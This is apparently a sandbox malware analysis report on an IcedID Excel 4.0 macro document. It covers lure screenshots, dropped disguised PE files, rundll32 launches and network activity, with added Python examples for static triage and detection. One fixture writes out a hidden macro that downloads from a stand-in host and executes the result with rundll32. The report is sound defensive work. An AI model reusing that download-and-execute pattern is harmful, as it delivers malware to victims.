Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp String found in binary or memory: https://d1.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
Source: rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp String found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/AmazonECSAnywherePreview.html?hp=tile&amp;so-exp=below
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
Source: rundll32.exe, 00000003.00000003.2110269066.0000000002C01000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp String found in binary or memory: https://press.aboutamazon.com/press-releases/aws
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/awscloud
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp String found in binary or memory: https://www.amazon.jobs/aws
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp String found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp String found in binary or memory: https://www.twitch.tv/aws
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown HTTPS traffic detected: 192.185.48.186:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.214.87:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.87.146.86:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.79.62.99:443 -> 192.168.2.22:49172 version: TLS 1.2

E-Banking Fraud:

Yara detected IcedID
Source: Yara match File source: 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2347303586.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2353273837.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2346946398.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2324539894.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2324305529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2313180906.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2353071481.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2312959484.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2294844286.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2347372775.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2307293375.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2324432561.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2312752671.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2300737619.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2359025585.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2288787523.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2300503265.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2358776145.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2359409712.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2353386032.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2359132350.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2318924371.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2306619325.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2306955212.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2300848573.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2318582057.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2318854529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2289125454.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2307060040.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2499534316.00000000000DD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2353251472.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2313048515.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2318832417.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2294985377.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2289046679.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2324458781.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2347597509.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2295056636.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2294958860.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2289433187.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2341036692.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2301147013.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2340962857.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2864, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2316, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please elk 14 Ru
Source: Screenshot number: 8 Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
Source: Screenshot number: 8 Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9 Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 15 Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
Source: Document image extraction number: 15 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
Source: Screenshot number: 12 Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 12 Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Found Excel 4.0 Macro with suspicious formulas
Source: document-1251000362.xlsm Initial sample: CALL
Source: document-1251000362.xlsm Initial sample: EXEC
Found abnormally large hidden Excel 4.0 Macro sheet
Source: document-1251000362.xlsm Initial sample: Sheet size: 36917
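The three findings above (CALL/EXEC formulas, a hidden Excel 4.0 macro sheet, and an unusually large sheet part) can be verified statically, without opening the workbook in Excel. The Python below is an added example, not part of this report and not the sandbox vendor's tooling. It builds a small constructed workbook in memory (the real sample is not reproduced) and applies the same checks: macrosheet parts are identified by their content type in [Content_Types].xml, sheet visibility comes from xl/workbook.xml, and formula text is scanned for XLM functions that execute code or touch the file system. The 20000-byte size threshold and the list of flagged functions are assumptions.

```python
"""Static triage of an .xlsm for hidden Excel 4.0 (XLM) macro sheets.

Added example, not part of the sandbox report and not the analysis
vendor's code. build_sample() constructs a tiny workbook in memory
(the real sample is not included); triage_xlsm() applies the checks the
report's signatures describe: macrosheet parts, hidden/veryHidden sheet
state, suspicious XLM functions, and an unusually large sheet part.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
NS_REL = "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}"
NS_PKG = "{http://schemas.openxmlformats.org/package/2006/relationships}"
NS_CT = "{http://schemas.openxmlformats.org/package/2006/content-types}"
MACROSHEET_CT = "application/vnd.ms-excel.macrosheet+xml"

# XLM functions that run code, load libraries or touch the file system (assumed list).
SUSPICIOUS_RE = re.compile(r"\b(EXEC|CALL|REGISTER|FOPEN|FWRITE|RUN)\s*\(", re.I)
LARGE_SHEET_BYTES = 20_000  # assumed threshold; the report flagged a 36917-byte sheet


def _part_path(target: str) -> str:
    """Resolve a workbook relationship Target to a zip member path."""
    return target.lstrip("/") if target.startswith("/") else "xl/" + target


def triage_xlsm(data: bytes, large_threshold: int = LARGE_SHEET_BYTES) -> dict:
    """Return macrosheet findings for an OOXML workbook given as raw bytes."""
    z = zipfile.ZipFile(io.BytesIO(data))
    names = set(z.namelist())

    # 1. Macrosheet parts are declared by content type, not by file name.
    ct = ET.fromstring(z.read("[Content_Types].xml"))
    macro_parts = [o.get("PartName").lstrip("/") for o in ct.iter(NS_CT + "Override")
                   if o.get("ContentType") == MACROSHEET_CT]

    # 2. Sheet name and visibility live in workbook.xml, keyed by relationship id.
    rels = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
    rid_to_part = {r.get("Id"): _part_path(r.get("Target"))
                   for r in rels.iter(NS_PKG + "Relationship")}
    wb = ET.fromstring(z.read("xl/workbook.xml"))
    sheets = {rid_to_part.get(s.get(NS_REL + "id")):
              {"name": s.get("name"), "state": s.get("state", "visible")}
              for s in wb.iter(NS_MAIN + "sheet")}

    # 3. Inspect every macrosheet: size, visibility and formula contents.
    findings = []
    for part in macro_parts:
        if part not in names:
            continue
        xml = z.read(part)
        formulas = [f.text or "" for f in ET.fromstring(xml).iter(NS_MAIN + "f")]
        hits = sorted({m.group(1).upper() for f in formulas
                       for m in SUSPICIOUS_RE.finditer(f)})
        info = sheets.get(part, {"name": None, "state": "unknown"})
        findings.append({"part": part, "name": info["name"], "state": info["state"],
                         "size": len(xml), "large": len(xml) >= large_threshold,
                         "suspicious": hits})
    return {"macrosheets": findings,
            "hidden_macro_with_exec": any(f["state"] != "visible" and f["suspicious"]
                                          for f in findings)}


def build_sample() -> bytes:
    """Constructed workbook: one visible worksheet, one veryHidden XLM macrosheet."""
    macro_xml = (
        '<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
        'xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"><sheetData>'
        '<row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
        '"https://example.invalid/3003.gif","..\\ksjvoefv.skd",0,0)</f></c></row>'
        '<row r="2"><c r="A2"><f>EXEC("rundll32 ..\\ksjvoefv.skd,DllRegisterServer")</f></c></row>'
        '</sheetData></xm:macrosheet>')
    parts = {
        "[Content_Types].xml":
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Override PartName="/xl/workbook.xml" ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>'
            '<Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>'
            '<Override PartName="/xl/macrosheets/sheet1.xml" ContentType="' + MACROSHEET_CT + '"/></Types>',
        "xl/_rels/workbook.xml.rels":
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>'
            '<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.xml"/></Relationships>',
        "xl/workbook.xml":
            '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
            'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><sheets>'
            '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
            '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/></sheets></workbook>',
        "xl/worksheets/sheet1.xml":
            '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData/></worksheet>',
        "xl/macrosheets/sheet1.xml": macro_xml,
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in parts.items():
            z.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_xlsm(build_sample()))
```

Point triage_xlsm() at the bytes of a real .xlsm to use it on a sample; note that a macrosheet whose state is veryHidden cannot be unhidden from the Excel UI at all, which is why the visibility attribute is worth reporting alongside the formula hits.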
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3
Contains functionality to call native functions
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_003B13B8 NtQuerySystemInformation,RtlAllocateHeap, 3_2_003B13B8
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_002B13B8 NtQuerySystemInformation,RtlAllocateHeap, 7_2_002B13B8
Detected potential crypto function
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_003B1100 3_2_003B1100
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000007FEF40E1000 3_2_000007FEF40E1000
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000007FEF40E1979 3_2_000007FEF40E1979
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000007FEF40E1610 3_2_000007FEF40E1610
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_002B1100 7_2_002B1100
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000007FEF46AF93A 7_2_000007FEF46AF93A
Source: rundll32.exe, 00000003.00000002.2499932403.0000000001B00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184161879.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178177559.0000000001D10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSM@11/20@871/6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$document-1251000362.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCCD0.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts (6 occurrences)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer
Source: document-1251000362.xlsm Metadefender: Detection: 13%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd4,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Automated click: OK (3 occurrences)
Source: Window Recorder Window detected: More than 3 window changes detected
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/media/image4.png
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/media/image3.png
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/media/image2.png
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3
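Two host artefacts in this report translate directly into detection logic: the System Summary process-creation lines (EXCEL.EXE launching rundll32 with ..\ksjvoefv.skd,DllRegisterServer, a module that is not named *.dll) and the non-matching-extension drops above (PE content written as 3003[1].gif and as .skd files). The Python below is an added example, not part of the report or the vendor's tooling. The process and file event records, the fake PE header and the file paths are constructed to mirror the report's observations, and the field names (parent_image, image, command_line, path, head) are assumed rather than taken from any specific EDR schema.

```python
"""Detection logic for two host artifacts recorded in this report: an Office
process launching rundll32 on a module that is not named *.dll, and PE content
written to disk under a non-executable extension such as .gif.

Added example, not part of the sandbox report. The event records, file paths
and file headers below are constructed to mirror the report's observations;
the field names (parent_image, image, command_line, path, head) are assumed,
not a specific EDR schema.
"""
import ntpath
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
EXEC_EXTS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv"}
# rundll32 [path\]module[,export] ; module may be quoted and may be a relative path.
RUNDLL32_RE = re.compile(
    r'^\s*"?(?:.*\\)?rundll32(?:\.exe)?"?\s+(?P<module>"[^"]+"|[^\s,]+)\s*(?:,\s*(?P<export>\S+))?',
    re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class FileEvent:
    image: str      # process that wrote the file
    path: str
    head: bytes     # first bytes of the file as written


def content_kind(head: bytes) -> str:
    """Classify a file by magic bytes; 'pe' needs MZ plus a valid PE signature."""
    if head[:2] == b"MZ":
        if len(head) >= 0x40:
            e_lfanew = int.from_bytes(head[0x3C:0x40], "little")
            if head[e_lfanew:e_lfanew + 4] == b"PE\0\0":
                return "pe"
        return "dos-mz"
    if head[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    if head[:8] == b"\x89PNG\r\n\x1a\n":
        return "png"
    return "unknown"


def office_spawn_findings(ev: ProcessEvent) -> list:
    """Office parent + rundll32 child: flag non-DLL module names and DllRegisterServer."""
    parent = ntpath.basename(ev.parent_image).lower()
    child = ntpath.basename(ev.image).lower()
    if parent not in OFFICE_IMAGES or child != "rundll32.exe":
        return []
    findings = ["office-spawns-rundll32"]
    m = RUNDLL32_RE.match(ev.command_line)
    if m:
        module = m.group("module").strip('"')
        ext = ntpath.splitext(module)[1].lower()
        if ext != ".dll":
            findings.append("rundll32-non-dll-module:" + (ext or "<none>"))
        export = (m.group("export") or "").lower()
        if export == "dllregisterserver":
            findings.append("rundll32-dllregisterserver")
    return findings


def extension_mismatch_findings(ev: FileEvent) -> list:
    """PE bytes under a non-executable extension (the report's non-matching extension)."""
    kind = content_kind(ev.head)
    ext = ntpath.splitext(ev.path)[1].lower()
    if kind in ("pe", "dos-mz") and ext not in EXEC_EXTS:
        tag = "pe-dropped-as-" + (ext or "<none>")
        if ntpath.basename(ev.image).lower() in OFFICE_IMAGES:
            tag += ":by-office"
        return [tag]
    return []


def analyze(process_events, file_events) -> list:
    """Run both rules over event lists and return the findings in order."""
    out = []
    for p in process_events:
        out += office_spawn_findings(p)
    for f in file_events:
        out += extension_mismatch_findings(f)
    return out


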